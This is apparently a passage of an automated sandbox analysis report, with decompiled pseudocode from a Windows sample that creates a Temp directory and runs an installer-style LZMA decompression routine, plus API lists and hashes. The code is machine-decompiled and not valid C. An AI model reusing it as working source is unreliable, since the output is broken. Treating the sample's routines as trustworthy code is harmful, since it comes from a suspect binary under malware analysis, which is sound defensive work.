                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 84%
                          			E004031F1(void* __eflags) {
                          				void* _t2;
                          				void* _t5;
                          				CHAR* _t6;
                          
                          				_t6 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                          				E00405CE3(_t6);
                          				_t2 = E004055E5(_t6);
                          				if(_t2 != 0) {
                          					E00405578(_t6);
                          					CreateDirectoryA(_t6, 0); // executed
                          					_t5 = E0040578B("1033", _t6); // executed
                          					return _t5;
                          				} else {
                          					return _t2;
                          				}
                          			}







                          APIs
                            • Part of subcall function 00405CE3: CharNextA.USER32(?), ref: 00405D3B
                            • Part of subcall function 00405CE3: CharNextA.USER32(?), ref: 00405D48
                            • Part of subcall function 00405CE3: CharNextA.USER32(?), ref: 00405D4D
                            • Part of subcall function 00405CE3: CharPrevA.USER32(?,?), ref: 00405D5D
                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Char$Next$CreateDirectoryPrev
                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 4115351271-1176120985
                          • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                          • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                          • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                          • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 99%
                          			E00406481() {
                          				signed int _t530;
                          				void _t537;
                          				signed int _t538;
                          				signed int _t539;
                          				unsigned short _t569;
                          				signed int _t579;
                          				signed int _t607;
                          				void* _t627;
                          				signed int _t628;
                          				signed int _t635;
                          				signed int* _t643;
                          				void* _t644;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					_t530 =  *(_t644 - 0x30);
                          					if(_t530 >= 4) {
                          					}
                          					 *(_t644 - 0x40) = 6;
                          					 *(_t644 - 0x7c) = 0x19;
                          					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                          					while(1) {
                          						L145:
                          						 *(_t644 - 0x50) = 1;
                          						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                          						while(1) {
                          							L149:
                          							if( *(_t644 - 0x48) <= 0) {
                          								goto L155;
                          							}
                          							L150:
                          							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                          							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                          							 *(_t644 - 0x54) = _t643;
                          							_t569 =  *_t643;
                          							_t635 = _t569 & 0x0000ffff;
                          							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                          							if( *(_t644 - 0xc) >= _t607) {
                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                          								_t628 = _t627 + 1;
                          								 *_t643 = _t569 - (_t569 >> 5);
                          								 *(_t644 - 0x50) = _t628;
                          							} else {
                          								 *(_t644 - 0x10) = _t607;
                          								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                          								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                          							}
                          							if( *(_t644 - 0x10) >= 0x1000000) {
                          								L148:
                          								_t487 = _t644 - 0x48;
                          								 *_t487 =  *(_t644 - 0x48) - 1;
                          								L149:
                          								if( *(_t644 - 0x48) <= 0) {
                          									goto L155;
                          								}
                          								goto L150;
                          							} else {
                          								L154:
                          								L146:
                          								if( *(_t644 - 0x6c) == 0) {
                          									L169:
                          									 *(_t644 - 0x88) = 0x18;
                          									L170:
                          									_t579 = 0x22;
                          									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                          									_t539 = 0;
                          									L172:
                          									return _t539;
                          								}
                          								L147:
                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                          								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          								_t484 = _t644 - 0x70;
                          								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                          								goto L148;
                          							}
                          							L155:
                          							_t537 =  *(_t644 - 0x7c);
                          							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                          							while(1) {
                          								L140:
                          								 *(_t644 - 0x88) = _t537;
                          								while(1) {
                          									L1:
                          									_t538 =  *(_t644 - 0x88);
                          									if(_t538 > 0x1c) {
                          										break;
                          									}
                          									L2:
                          									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
                          										case 0:
                          											L3:
                          											if( *(_t644 - 0x6c) == 0) {
                          												goto L170;
                          											}
                          											L4:
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                          											_t538 =  *( *(_t644 - 0x70));
                          											if(_t538 > 0xe1) {
                          												goto L171;
                          											}
                          											L5:
                          											_t542 = _t538 & 0x000000ff;
                          											_push(0x2d);
                          											asm("cdq");
                          											_pop(_t581);
                          											_push(9);
                          											_pop(_t582);
                          											_t638 = _t542 / _t581;
                          											_t544 = _t542 % _t581 & 0x000000ff;
                          											asm("cdq");
                          											_t633 = _t544 % _t582 & 0x000000ff;
                          											 *(_t644 - 0x3c) = _t633;
                          											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                          											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                          											_t641 = (0x300 << _t633 + _t638) + 0x736;
                          											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                          												L10:
                          												if(_t641 == 0) {
                          													L12:
                          													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                          													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                          													goto L15;
                          												} else {
                          													goto L11;
                          												}
                          												do {
                          													L11:
                          													_t641 = _t641 - 1;
                          													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                          												} while (_t641 != 0);
                          												goto L12;
                          											}
                          											L6:
                          											if( *(_t644 - 4) != 0) {
                          												GlobalFree( *(_t644 - 4));
                          											}
                          											_t538 = GlobalAlloc(0x40, 0x600); // executed
                          											 *(_t644 - 4) = _t538;
                          											if(_t538 == 0) {
                          												goto L171;
                          											} else {
                          												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                          												goto L10;
                          											}
                          										case 1:
                          											L13:
                          											__eflags =  *(_t644 - 0x6c);
                          											if( *(_t644 - 0x6c) == 0) {
                          												L157:
                          												 *(_t644 - 0x88) = 1;
                          												goto L170;
                          											}
                          											L14:
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                          											_t45 = _t644 - 0x48;
                          											 *_t45 =  *(_t644 - 0x48) + 1;
                          											__eflags =  *_t45;
                          											L15:
                          											if( *(_t644 - 0x48) < 4) {
                          												goto L13;
                          											}
                          											L16:
                          											_t550 =  *(_t644 - 0x40);
                          											if(_t550 ==  *(_t644 - 0x74)) {
                          												L20:
                          												 *(_t644 - 0x48) = 5;
                          												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                          												goto L23;
                          											}
                          											L17:
                          											 *(_t644 - 0x74) = _t550;
                          											if( *(_t644 - 8) != 0) {
                          												GlobalFree( *(_t644 - 8));
                          											}
                          											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                          											 *(_t644 - 8) = _t538;
                          											if(_t538 == 0) {
                          												goto L171;
                          											} else {
                          												goto L20;
                          											}
                          										case 2:
                          											L24:
                          											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                          											 *(_t644 - 0x84) = 6;
                          											 *(_t644 - 0x4c) = _t557;
                          											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                          											goto L132;
                          										case 3:
                          											L21:
                          											__eflags =  *(_t644 - 0x6c);
                          											if( *(_t644 - 0x6c) == 0) {
                          												L158:
                          												 *(_t644 - 0x88) = 3;
                          												goto L170;
                          											}
                          											L22:
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											_t67 = _t644 - 0x70;
                          											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                          											__eflags =  *_t67;
                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                          											L23:
                          											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                          											if( *(_t644 - 0x48) != 0) {
                          												goto L21;
                          											}
                          											goto L24;
                          										case 4:
                          											L133:
                          											_t559 =  *_t642;
                          											_t626 = _t559 & 0x0000ffff;
                          											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                          											if( *(_t644 - 0xc) >= _t596) {
                          												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                          												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                          												 *(_t644 - 0x40) = 1;
                          												_t560 = _t559 - (_t559 >> 5);
                          												__eflags = _t560;
                          												 *_t642 = _t560;
                          											} else {
                          												 *(_t644 - 0x10) = _t596;
                          												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                          												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                          											}
                          											if( *(_t644 - 0x10) >= 0x1000000) {
                          												goto L139;
                          											} else {
                          												goto L137;
                          											}
                          										case 5:
                          											L137:
                          											if( *(_t644 - 0x6c) == 0) {
                          												L168:
                          												 *(_t644 - 0x88) = 5;
                          												goto L170;
                          											}
                          											L138:
                          											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                          											L139:
                          											_t537 =  *(_t644 - 0x84);
                          											L140:
                          											 *(_t644 - 0x88) = _t537;
                          											goto L1;
                          										case 6:
                          											L25:
                          											__edx = 0;
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L36:
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x34) = 1;
                          												 *(__ebp - 0x84) = 7;
                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											L26:
                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          											__esi =  *(__ebp - 0x60);
                          											__cl = 8;
                          											__cl = 8 -  *(__ebp - 0x3c);
                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          											__ecx =  *(__ebp - 0x3c);
                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          											__ecx =  *(__ebp - 4);
                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          											__eflags =  *(__ebp - 0x38) - 4;
                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											if( *(__ebp - 0x38) >= 4) {
                          												__eflags =  *(__ebp - 0x38) - 0xa;
                          												if( *(__ebp - 0x38) >= 0xa) {
                          													_t98 = __ebp - 0x38;
                          													 *_t98 =  *(__ebp - 0x38) - 6;
                          													__eflags =  *_t98;
                          												} else {
                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          												}
                          											} else {
                          												 *(__ebp - 0x38) = 0;
                          											}
                          											__eflags =  *(__ebp - 0x34) - __edx;
                          											if( *(__ebp - 0x34) == __edx) {
                          												L35:
                          												__ebx = 0;
                          												__ebx = 1;
                          												goto L61;
                          											} else {
                          												L32:
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__ecx =  *(__ebp - 8);
                          												__ebx = 0;
                          												__ebx = 1;
                          												__al =  *((intOrPtr*)(__eax + __ecx));
                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          												goto L41;
                          											}
                          										case 7:
                          											L66:
                          											__eflags =  *(__ebp - 0x40) - 1;
                          											if( *(__ebp - 0x40) != 1) {
                          												L68:
                          												__eax =  *(__ebp - 0x24);
                          												 *(__ebp - 0x80) = 0x16;
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												__eax =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xa;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          												__eax =  *(__ebp - 4);
                          												__eax =  *(__ebp - 4) + 0x664;
                          												__eflags = __eax;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L69;
                          											}
                          											L67:
                          											__eax =  *(__ebp - 4);
                          											__ecx =  *(__ebp - 0x38);
                          											 *(__ebp - 0x84) = 8;
                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          											goto L132;
                          										case 8:
                          											L70:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xa;
                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          											} else {
                          												__eax =  *(__ebp - 0x38);
                          												__ecx =  *(__ebp - 4);
                          												__eax =  *(__ebp - 0x38) + 0xf;
                          												 *(__ebp - 0x84) = 9;
                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          											}
                          											goto L132;
                          										case 9:
                          											L73:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												goto L90;
                          											}
                          											L74:
                          											__eflags =  *(__ebp - 0x60);
                          											if( *(__ebp - 0x60) == 0) {
                          												goto L171;
                          											}
                          											L75:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                          											__eflags = _t259;
                          											0 | _t259 = _t259 + _t259 + 9;
                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                          											goto L76;
                          										case 0xa:
                          											L82:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L84:
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xb;
                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											L83:
                          											__eax =  *(__ebp - 0x28);
                          											goto L89;
                          										case 0xb:
                          											L85:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__ecx =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x20);
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          											} else {
                          												__eax =  *(__ebp - 0x24);
                          											}
                          											__ecx =  *(__ebp - 0x28);
                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          											L89:
                          											__ecx =  *(__ebp - 0x2c);
                          											 *(__ebp - 0x2c) = __eax;
                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          											L90:
                          											__eax =  *(__ebp - 4);
                          											 *(__ebp - 0x80) = 0x15;
                          											__eax =  *(__ebp - 4) + 0xa68;
                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          											goto L69;
                          										case 0xc:
                          											L99:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L164:
                          												 *(__ebp - 0x88) = 0xc;
                          												goto L170;
                          											}
                          											L100:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t334 = __ebp - 0x70;
                          											 *_t334 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t334;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											__eax =  *(__ebp - 0x2c);
                          											goto L101;
                          										case 0xd:
                          											L37:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L159:
                          												 *(__ebp - 0x88) = 0xd;
                          												goto L170;
                          											}
                          											L38:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t122 = __ebp - 0x70;
                          											 *_t122 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t122;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L39:
                          											__eax =  *(__ebp - 0x40);
                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          												goto L48;
                          											}
                          											L40:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												goto L54;
                          											}
                          											L41:
                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          											 *(__ebp - 0x48) = __eax;
                          											__eax = __eax + 1;
                          											__eax = __eax << 8;
                          											__eax = __eax + __ebx;
                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edx = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												 *(__ebp - 0x40) = 1;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												__ebx = __ebx + __ebx + 1;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edx;
                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L39;
                          											} else {
                          												L45:
                          												goto L37;
                          											}
                          										case 0xe:
                          											L46:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L160:
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											L47:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t156 = __ebp - 0x70;
                          											 *_t156 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t156;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											while(1) {
                          												L48:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													break;
                          												}
                          												L49:
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t170 = __edx + 1; // 0x1
                          													__ebx = _t170;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													continue;
                          												} else {
                          													L53:
                          													goto L46;
                          												}
                          											}
                          											L54:
                          											_t173 = __ebp - 0x34;
                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          											__eflags =  *_t173;
                          											goto L55;
                          										case 0xf:
                          											L58:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L161:
                          												 *(__ebp - 0x88) = 0xf;
                          												goto L170;
                          											}
                          											L59:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t203 = __ebp - 0x70;
                          											 *_t203 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t203;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L60:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												L55:
                          												__al =  *(__ebp - 0x44);
                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          												goto L56;
                          											}
                          											L61:
                          											__eax =  *(__ebp - 0x58);
                          											__edx = __ebx + __ebx;
                          											__ecx =  *(__ebp - 0x10);
                          											__esi = __edx + __eax;
                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												_t217 = __edx + 1; // 0x1
                          												__ebx = _t217;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L60;
                          											} else {
                          												L65:
                          												goto L58;
                          											}
                          										case 0x10:
                          											L109:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L165:
                          												 *(__ebp - 0x88) = 0x10;
                          												goto L170;
                          											}
                          											L110:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t365 = __ebp - 0x70;
                          											 *_t365 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t365;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											goto L111;
                          										case 0x11:
                          											L69:
                          											__esi =  *(__ebp - 0x58);
                          											 *(__ebp - 0x84) = 0x12;
                          											goto L132;
                          										case 0x12:
                          											L128:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L131:
                          												__eax =  *(__ebp - 0x58);
                          												 *(__ebp - 0x84) = 0x13;
                          												__esi =  *(__ebp - 0x58) + 2;
                          												L132:
                          												 *(_t644 - 0x54) = _t642;
                          												goto L133;
                          											}
                          											L129:
                          											__eax =  *(__ebp - 0x4c);
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											__eflags = __eax;
                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                          											goto L130;
                          										case 0x13:
                          											L141:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L143:
                          												_t469 = __ebp - 0x58;
                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                          												__eflags =  *_t469;
                          												 *(__ebp - 0x30) = 0x10;
                          												 *(__ebp - 0x40) = 8;
                          												L144:
                          												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                          												L145:
                          												 *(_t644 - 0x50) = 1;
